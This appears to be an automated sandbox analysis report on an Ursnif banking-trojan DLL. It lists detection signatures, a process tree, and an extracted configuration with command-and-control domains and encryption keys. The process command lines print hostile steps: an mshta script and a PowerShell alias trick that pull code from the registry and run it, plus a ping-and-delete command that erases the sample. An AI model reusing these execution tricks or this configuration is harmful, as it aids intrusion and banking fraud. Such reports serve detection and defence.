Edit tour
Windows
Analysis Report
61ee6edf7de65.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 912 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\61e e6edf7de65 .dll" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 6348 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\61e e6edf7de65 .dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 4848 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\61ee 6edf7de65. dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 4824 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - control.exe (PID: 6104 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - rundll32.exe (PID: 2944 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L -h MD5: 73C519F050C20580F8A62C849D49215A)
- mshta.exe (PID: 6808 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Wulb='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Wulb).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\MarkC hart'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 3728 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name meew olqgy -val ue gp; new -alias -na me wuuiocp tps -value iex; wuui ocptps ([S ystem.Text .Encoding] ::ASCII.Ge tString((m eewolqgy " HKCU:Softw are\AppDat aLow\Softw are\Micros oft\54E807 03-A337-A6 B8-CDC8-87 3A517CAB0E ").UtilDia gram)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 2796 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 5812 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\hddjt5k h\hddjt5kh .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 7104 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESA9AF.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\hdd jt5kh\CSCA C4C40391E0 044BAAD217 F7E1F4E48A .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 4408 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\32ysuxe g\32ysuxeg .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6312 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESC843.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\32y suxeg\CSCD D69F677ABA 1437DBA6EE 4792C92D38 A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3440 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 5224 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\61ee6edf 7de65.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 3640 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 5632 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - cmd.exe (PID: 6152 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\61ee6edf 7de65.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 5860 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 3092 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - cmd.exe (PID: 6176 cmdline:
cmd /C "ns lookup myi p.opendns. com resolv er1.opendn s.com > C: \Users\use r\AppData\ Local\Temp \442E.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- mshta.exe (PID: 6024 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Vn1t='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Vn1t).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\MarkC hart'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 5408 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name vxlt ksnx -valu e gp; new- alias -nam e fgysecca lw -value iex; fgyse ccalw ([Sy stem.Text. Encoding]: :ASCII.Get String((vx ltksnx "HK CU:Softwar e\AppDataL ow\Softwar e\Microsof t\54E80703 -A337-A6B8 -CDC8-873A 517CAB0E") .UtilDiagr am)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6292 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\qmanv25 g\qmanv25g .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 3272 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESCEBB.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\qma nv25g\CSC8 3689403A12 4ABD8F80AE 4A2C14BFB. TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 4636 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\vn3zgr4 g\vn3zgr4g .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6592 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESE6D7.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\vn3 zgr4g\CSCD 86376609B0 744ABB5692 8FEBE923C3 .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "bkFTFgKp65D5Jru5rf49R+GXnNukXGpZwjIwkjTtlHtgZk7oxIROD9a73bCW6q+N//ka8JpBA5kzPLmOYX0Yasr3Rl/9Zuz9f2VWaX0efOwZY2QKrOoQ67764YcBo8lsKwkYr7PpHkMHQxnMs6NEKJ6J1N6xfUndxmGR7l13Aaosa8p5sAWD3DLmA1KYT+Yo7POW4hnwwj/vfsWt00ns0kdIj1rxgp6FgYSdcYrFJsGyw1c4V2WgskLjtOH2H4NxYnKJgMX4ugqjKvCIFcuUg9umN2tNFjXLFbc81b/KRkQqTX8MMan6JAeAyuM92LJfIu2ZUFHAyr0vE+Uoz2nr6m8vyE3ODdwccpisKQUEL5E=", "c2_domain": ["giporedtrip.at", "habpfans.at"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "OejOdTRHaO03XbEm", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "20000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Click to see the 29 entries |
System Summary |
---|
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link |
Source: | Avira: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: | ||
Source: | Domain query: | ||
Source: | Network Connect: | ||
Source: | Network Connect: |
Source: | Process created: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: |
System Summary |
---|
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Binary or memory string: |
Source: | Key opened: | ||
Source: | Key opened: |
Source: | Virustotal: |
Source: | Static PE information: |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Code function: |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Window detected: |
Source: | File opened: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | ||
Source: | Thread delayed: |
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: |
